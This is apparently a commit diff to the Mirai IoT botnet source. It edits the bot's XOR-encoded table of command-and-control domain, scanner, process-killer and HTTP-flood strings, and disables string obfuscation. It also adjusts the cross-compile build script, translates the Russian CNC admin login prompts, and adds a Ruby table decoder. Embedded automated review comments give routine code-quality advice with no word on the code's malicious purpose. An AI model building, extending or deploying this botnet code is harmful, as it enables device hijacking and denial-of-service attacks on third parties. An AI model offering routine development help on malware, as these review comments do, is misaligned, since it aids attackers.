add_entry(TABLE_HTTP_TWO, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
add_entry(TABLE_HTTP_THREE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
add_entry(TABLE_HTTP_FOUR, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
add_entry(TABLE_HTTP_FIVE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x30\x5f\x31\x31\x5f\x36\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x36\x30\x31\x2e\x37\x2e\x37\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x56\x65\x72\x73\x69\x6f\x6e\x2f\x39\x2e\x31\x2e\x32\x20\x53\x61\x66\x61\x72\x69\x2f\x36\x30\x31\x2e\x37\x2e\x37\x00", 117);
add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);
// safe string https://youtu.be/dQw4w9WgXcQ
add_entry(TABLE_KILLER_SAFE, "\x4A\x56\x56\x52\x51\x18\x0D\x0D\x5B\x4D\x57\x56\x57\x0C\x40\x47\x0D\x46\x73\x55\x16\x55\x1B\x75\x45\x7A\x41\x73\x22", 29);
add_entry(TABLE_KILLER_PROC, "\x0D\x52\x50\x4D\x41\x0D\x22", 7);
add_entry(TABLE_KILLER_EXE, "\x0D\x47\x5A\x47\x22", 5);
add_entry(TABLE_KILLER_DELETED, "\x02\x0A\x46\x47\x4E\x47\x56\x47\x46\x0B\x22", 11);
add_entry(TABLE_KILLER_FD, "\x0D\x44\x46\x22", 4);
add_entry(TABLE_KILLER_ANIME, "\x0C\x43\x4C\x4B\x4F\x47\x22", 7);
add_entry(TABLE_KILLER_STATUS, "\x0D\x51\x56\x43\x56\x57\x51\x22", 8);
add_entry(TABLE_MEM_QBOT, "\x70\x67\x72\x6D\x70\x76\x02\x07\x51\x18\x07\x51\x22", 13);
add_entry(TABLE_MEM_QBOT2, "\x6A\x76\x76\x72\x64\x6E\x6D\x6D\x66\x22", 10);
add_entry(TABLE_MEM_QBOT3, "\x6E\x6D\x6E\x6C\x6D\x65\x76\x64\x6D\x22", 10);
add_entry(TABLE_MEM_UPX, "\x7E\x5A\x17\x1A\x7E\x5A\x16\x66\x7E\x5A\x16\x67\x7E\x5A\x16\x67\x7E\x5A\x16\x11\x7E\x5A\x17\x12\x7E\x5A\x16\x14\x7E\x5A\x10\x10\x22", 33);
add_entry(TABLE_MEM_ZOLLARD, "\x58\x4D\x4E\x4E\x43\x50\x46\x22", 8);
add_entry(TABLE_MEM_REMAITEN, "\x65\x67\x76\x6E\x6D\x61\x63\x6E\x6B\x72\x22", 11);
add_entry(TABLE_SCAN_SHELL, "\x51\x4A\x47\x4E\x4E\x22", 6);
add_entry(TABLE_SCAN_ENABLE, "\x47\x4C\x43\x40\x4E\x47\x22", 7);
add_entry(TABLE_SCAN_SYSTEM, "\x51\x5B\x51\x56\x47\x4F\x22", 7);
add_entry(TABLE_SCAN_SH, "\x51\x4A\x22", 3);
add_entry(TABLE_SCAN_QUERY, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x6F\x6B\x70\x63\x6B\x22", 19);
add_entry(TABLE_SCAN_RESP, "\x6F\x6B\x70\x63\x6B\x18\x02\x43\x52\x52\x4E\x47\x56\x02\x4C\x4D\x56\x02\x44\x4D\x57\x4C\x46\x22", 24);
add_entry(TABLE_SCAN_NCORRECT, "\x4C\x41\x4D\x50\x50\x47\x41\x56\x22", 9);
add_entry(TABLE_SCAN_PS, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x52\x51\x22", 16);
add_entry(TABLE_SCAN_KILL_9, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x49\x4B\x4E\x4E\x02\x0F\x1B\x02\x22", 22);
add_entry(TABLE_ATK_VSE, "\x76\x71\x4D\x57\x50\x41\x47\x02\x67\x4C\x45\x4B\x4C\x47\x02\x73\x57\x47\x50\x5B\x22", 21);
add_entry(TABLE_ATK_RESOLVER, "\x0D\x47\x56\x41\x0D\x50\x47\x51\x4D\x4E\x54\x0C\x41\x4D\x4C\x44\x22", 17);
add_entry(TABLE_ATK_NSERV, "\x4C\x43\x4F\x47\x51\x47\x50\x54\x47\x50\x02\x22", 12);
add_entry(TABLE_ATK_KEEP_ALIVE, "\x61\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x02\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 23);
add_entry(TABLE_ATK_ACCEPT, "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5A\x56\x0D\x4A\x56\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4A\x56\x4F\x4E\x09\x5A\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4F\x4E\x19\x53\x1F\x12\x0C\x1B\x0E\x4B\x4F\x43\x45\x47\x0D\x55\x47\x40\x52\x0E\x08\x0D\x08\x19\x53\x1F\x12\x0C\x1A\x22", 83);
add_entry(TABLE_ATK_ACCEPT_LNG, "\x63\x41\x41\x47\x52\x56\x0F\x6E\x43\x4C\x45\x57\x43\x45\x47\x18\x02\x47\x4C\x0F\x77\x71\x0E\x47\x4C\x19\x53\x1F\x12\x0C\x1A\x22", 32);
add_entry(TABLE_ATK_CONTENT_TYPE, "\x61\x4D\x4C\x56\x47\x4C\x56\x0F\x76\x5B\x52\x47\x18\x02\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x0F\x55\x55\x55\x0F\x44\x4D\x50\x4F\x0F\x57\x50\x4E\x47\x4C\x41\x4D\x46\x47\x46\x22", 48);
add_entry(TABLE_ATK_SET_COOKIE, "\x51\x47\x56\x61\x4D\x4D\x49\x4B\x47\x0A\x05\x22", 12);
add_entry(TABLE_ATK_REFRESH_HDR, "\x50\x47\x44\x50\x47\x51\x4A\x18\x22", 9);
add_entry(TABLE_ATK_LOCATION_HDR, "\x4E\x4D\x41\x43\x56\x4B\x4D\x4C\x18\x22", 10);
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x51\x47\x56\x0F\x41\x4D\x4D\x49\x4B\x47\x18\x22", 12);
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x41\x4D\x4C\x56\x47\x4C\x56\x0F\x4E\x47\x4C\x45\x56\x4A\x18\x22", 16);
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x56\x50\x43\x4C\x51\x44\x47\x50\x0F\x47\x4C\x41\x4D\x46\x4B\x4C\x45\x18\x22", 19);
add_entry(TABLE_ATK_CHUNKED, "\x41\x4A\x57\x4C\x49\x47\x46\x22", 8);
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 11);
add_entry(TABLE_ATK_CONNECTION_HDR, "\x41\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x22", 12);
add_entry(TABLE_ATK_DOSARREST, "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4D\x51\x43\x50\x50\x47\x51\x56\x22", 18);
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4E\x4D\x57\x46\x44\x4E\x43\x50\x47\x0F\x4C\x45\x4B\x4C\x5A\x22", 25);
add_entry(TABLE_HTTP_ONE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
add_entry(TABLE_HTTP_TWO, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
add_entry(TABLE_HTTP_THREE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
add_entry(TABLE_HTTP_FOUR, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
add_entry(TABLE_HTTP_FIVE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x6F\x43\x41\x4B\x4C\x56\x4D\x51\x4A\x19\x02\x6B\x4C\x56\x47\x4E\x02\x6F\x43\x41\x02\x6D\x71\x02\x7A\x02\x13\x12\x7D\x13\x13\x7D\x14\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x14\x12\x13\x0C\x15\x0C\x15\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x74\x47\x50\x51\x4B\x4D\x4C\x0D\x1B\x0C\x13\x0C\x10\x02\x71\x43\x44\x43\x50\x4B\x0D\x14\x12\x13\x0C\x15\x0C\x15\x22", 117);
}
void table_unlock_val(uint8_t id)
@ -86,8 +86,8 @@ void table_unlock_val(uint8_t id)
return;
}
#endif
toggle_obf(id);
//NO OBFUSCATION NEEDED. FIXED.
//toggle_obf(id);
}
void table_lock_val(uint8_t id)
@ -101,8 +101,8 @@ void table_lock_val(uint8_t id)
return;
}
#endif
toggle_obf(id);
//NO OBFUSCATION
//toggle_obf(id);
}
char *table_retrieve_val(int id, int *len)


@ -1,4 +1,6 @@
#!/bin/bash
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
FLAGS=""
@ -29,7 +31,6 @@ elif [ "$1" == "release" ]; then
compile_bot mipsel mirai.mpsl "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot armv4l mirai.arm "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot armv5l mirai.arm5n "$FLAGS -DKILLER_REBIND_SSH"
compile_bot armv6l mirai.arm7 "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot powerpc mirai.ppc "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot sparc mirai.spc "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot m68k mirai.m68k "$FLAGS -DKILLER_REBIND_SSH -static"
@ -40,7 +41,6 @@ elif [ "$1" == "release" ]; then
compile_bot mipsel miraint.mpsl "-static"
compile_bot armv4l miraint.arm "-static"
compile_bot armv5l miraint.arm5n " "
compile_bot armv6l miraint.arm7 "-static"
compile_bot powerpc miraint.ppc "-static"
compile_bot sparc miraint.spc "-static"
compile_bot m68k miraint.m68k "-static"
@ -51,7 +51,6 @@ elif [ "$1" == "debug" ]; then
gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.dbg
mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips
armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm
armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7
sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4
gcc -std=c99 tools/enc.c -g -o debug/enc
gcc -std=c99 tools/nogdb.c -g -o debug/nogdb
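Review bot: The two `go get` lines added under `#!/bin/bash` fetch `github.com/go-sql-driver/mysql` and `github.com/mattn/go-shellwords` from the network at whatever revision upstream serves when the script runs, so the build is neither reproducible nor checkable against a recorded revision; pin each to a known revision (or vendor the packages) and keep the fetch out of the compile steps. The `armv6l` `compile_bot` lines are dropped from the `release`, `miraint` and `debug` blocks with nothing recording why that target is no longer built; a one-line `# armv6l dropped: <reason>` above each block would preserve the intent for the next reader. The `release` and `debug` branches begin before and end after the visible hunks.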


@ -35,7 +35,8 @@ func (this *Admin) Handle() {
// Get username
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m"))
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m\r\n"))
this.conn.Write([]byte("\033[34;1musername\033[33;3m: \033[0m"))
username, err := this.ReadLine(false)
if err != nil {
return
@ -43,7 +44,8 @@ func (this *Admin) Handle() {
// Get password
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m"))
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m\r\n"))
this.conn.Write([]byte("\033[34;1mpassword\033[33;3m: \033[0m"))
password, err := this.ReadLine(true)
if err != nil {
return
@ -53,7 +55,8 @@ func (this *Admin) Handle() {
this.conn.Write([]byte("\r\n"))
spinBuf := []byte{'-', '\\', '|', '/'}
for i := 0; i < 15; i++ {
this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
//this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
this.conn.Write(append([]byte("\r\033[37;1mchecking account ... \033[31m"), spinBuf[i % len(spinBuf)]))
time.Sleep(time.Duration(300) * time.Millisecond)
}
@ -61,7 +64,9 @@ func (this *Admin) Handle() {
var userInfo AccountInfo
if loggedIn, userInfo = database.TryLogin(username, password); !loggedIn {
this.conn.Write([]byte("\r\033[32;1mпроизошла неизвестная ошибка\r\n"))
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m"))
this.conn.Write([]byte("\r\033[32;1mAn unknown error occurred\r\n"))
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m\r\n"))
this.conn.Write([]byte("\033[31mPress any key to exit. (any key)\033[0m"))
buf := make([]byte, 1)
this.conn.Read(buf)
return
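Review bot: The commented-out spinner write left directly above the `checking account ...` line is dead code and should be deleted rather than kept. The Russian prompt writes retained beside each new English prompt (`пользователь`, `пароль`, `произошла неизвестная ошибка` / `нажмите любую клавишу`) now send both languages back to back, which reads as a half-finished translation — keep one set or the other. None of the `this.conn.Write` return values in this section are checked, which predates the change but is worth a `// write errors deliberately ignored: deadline governs the session` comment if that is the intent. `Handle` starts before and continues after this section.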


@ -7,7 +7,7 @@ import (
"time"
)
const DatabaseAddr string = "127.0.0.1"
const DatabaseAddr string = "127.0.0.1:3306"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"

58
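--- a/tools/decode_table.rb
+++ b/tools/decode_table.rb
@@ -0,0 +1,58 @@
+hashtable = {
+TABLE_CNC_DOMAIN: "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
+TABLE_CNC_PORT: "\x22\x35",
+TABLE_SCAN_CB_DOMAIN: "\x50\x47\x52\x4d\x50\x56\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
+TABLE_SCAN_CB_PORT: "\x99\xc7",
+TABLE_EXEC_SUCCESS: "\x4e\x4b\x51\x56\x47\x4c\x4b\x4c\x45\x02\x56\x57\x4c\x12\x22",
+TABLE_KILLER_SAFE: "\x4a\x56\x56\x52\x51\x18\x0d\x0d\x5b\x4d\x57\x56\x57\x0c\x40\x47\x0d\x46\x73\x55\x16\x55\x1b\x75\x45\x7a\x41\x73\x22",
+TABLE_KILLER_PROC: "\x0d\x52\x50\x4d\x41\x0d\x22",
+TABLE_KILLER_EXE: "\x0d\x47\x5a\x47\x22",
+TABLE_KILLER_DELETED: "\x02\x0a\x46\x47\x4e\x47\x56\x47\x46\x0b\x22",
+TABLE_KILLER_FD: "\x0d\x44\x46\x22",
+TABLE_KILLER_ANIME: "\x0c\x43\x4c\x4b\x4f\x47\x22",
+TABLE_KILLER_STATUS: "\x0d\x51\x56\x43\x56\x57\x51\x22",
+TABLE_MEM_QBOT: "\x70\x67\x72\x6d\x70\x76\x02\x07\x51\x18\x07\x51\x22",
+TABLE_MEM_QBOT2: "\x6a\x76\x76\x72\x64\x6e\x6d\x6d\x66\x22",
+TABLE_MEM_QBOT3: "\x6e\x6d\x6e\x6c\x6d\x65\x76\x64\x6d\x22",
+TABLE_MEM_UPX: "\x7e\x5a\x17\x1a\x7e\x5a\x16\x66\x7e\x5a\x16\x67\x7e\x5a\x16\x67\x7e\x5a\x16\x11\x7e\x5a\x17\x12\x7e\x5a\x16\x14\x7e\x5a\x10\x10\x22",
+TABLE_MEM_ZOLLARD: "\x58\x4d\x4e\x4e\x43\x50\x46\x22",
+TABLE_MEM_REMAITEN: "\x65\x67\x76\x6e\x6d\x61\x63\x6e\x6b\x72\x22",
+TABLE_SCAN_SHELL: "\x51\x4a\x47\x4e\x4e\x22",
+TABLE_SCAN_ENABLE: "\x47\x4c\x43\x40\x4e\x47\x22",
+TABLE_SCAN_SYSTEM: "\x51\x5b\x51\x56\x47\x4f\x22",
+TABLE_SCAN_SH: "\x51\x4a\x22",
+TABLE_SCAN_QUERY: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x6f\x6b\x70\x63\x6b\x22",
+TABLE_SCAN_RESP: "\x6f\x6b\x70\x63\x6b\x18\x02\x43\x52\x52\x4e\x47\x56\x02\x4c\x4d\x56\x02\x44\x4d\x57\x4c\x46\x22",
+TABLE_SCAN_NCORRECT: "\x4c\x41\x4d\x50\x50\x47\x41\x56\x22",
+TABLE_SCAN_PS: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x52\x51\x22",
+TABLE_SCAN_KILL_9: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x49\x4b\x4e\x4e\x02\x0f\x1b\x02\x22",
+TABLE_ATK_VSE: "\x76\x71\x4d\x57\x50\x41\x47\x02\x67\x4c\x45\x4b\x4c\x47\x02\x73\x57\x47\x50\x5b\x22",
+TABLE_ATK_RESOLVER: "\x0d\x47\x56\x41\x0d\x50\x47\x51\x4d\x4e\x54\x0c\x41\x4d\x4c\x44\x22",
+TABLE_ATK_NSERV: "\x4c\x43\x4f\x47\x51\x47\x50\x54\x47\x50\x02\x22",
+TABLE_ATK_KEEP_ALIVE: "\x61\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x02\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
+TABLE_ATK_ACCEPT: "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5a\x56\x0d\x4a\x56\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4a\x56\x4f\x4e\x09\x5a\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4f\x4e\x19\x53\x1f\x12\x0c\x1b\x0e\x4b\x4f\x43\x45\x47\x0d\x55\x47\x40\x52\x0e\x08\x0d\x08\x19\x53\x1f\x12\x0c\x1a\x22",
+TABLE_ATK_ACCEPT_LNG: "\x63\x41\x41\x47\x52\x56\x0f\x6e\x43\x4c\x45\x57\x43\x45\x47\x18\x02\x47\x4c\x0f\x77\x71\x0e\x47\x4c\x19\x53\x1f\x12\x0c\x1a\x22",
+TABLE_ATK_CONTENT_TYPE: "\x61\x4d\x4c\x56\x47\x4c\x56\x0f\x76\x5b\x52\x47\x18\x02\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x0f\x55\x55\x55\x0f\x44\x4d\x50\x4f\x0f\x57\x50\x4e\x47\x4c\x41\x4d\x46\x47\x46\x22",
+TABLE_ATK_SET_COOKIE: "\x51\x47\x56\x61\x4d\x4d\x49\x4b\x47\x0a\x05\x22",
+TABLE_ATK_REFRESH_HDR: "\x50\x47\x44\x50\x47\x51\x4a\x18\x22",
+TABLE_ATK_LOCATION_HDR: "\x4e\x4d\x41\x43\x56\x4b\x4d\x4c\x18\x22",
+TABLE_ATK_SET_COOKIE_HDR: "\x51\x47\x56\x0f\x41\x4d\x4d\x49\x4b\x47\x18\x22",
+TABLE_ATK_CONTENT_LENGTH_HDR: "\x41\x4d\x4c\x56\x47\x4c\x56\x0f\x4e\x47\x4c\x45\x56\x4a\x18\x22",
+TABLE_ATK_TRANSFER_ENCODING_HDR: "\x56\x50\x43\x4c\x51\x44\x47\x50\x0f\x47\x4c\x41\x4d\x46\x4b\x4c\x45\x18\x22",
+TABLE_ATK_CHUNKED: "\x41\x4a\x57\x4c\x49\x47\x46\x22",
+TABLE_ATK_KEEP_ALIVE_HDR: "\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
+TABLE_ATK_CONNECTION_HDR: "\x41\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x22",
+TABLE_ATK_DOSARREST: "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4d\x51\x43\x50\x50\x47\x51\x56\x22",
+TABLE_ATK_CLOUDFLARE_NGINX: "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4e\x4d\x57\x46\x44\x4e\x43\x50\x47\x0f\x4c\x45\x4b\x4c\x5a\x22",
+TABLE_HTTP_ONE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_TWO: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_THREE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_FOUR: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
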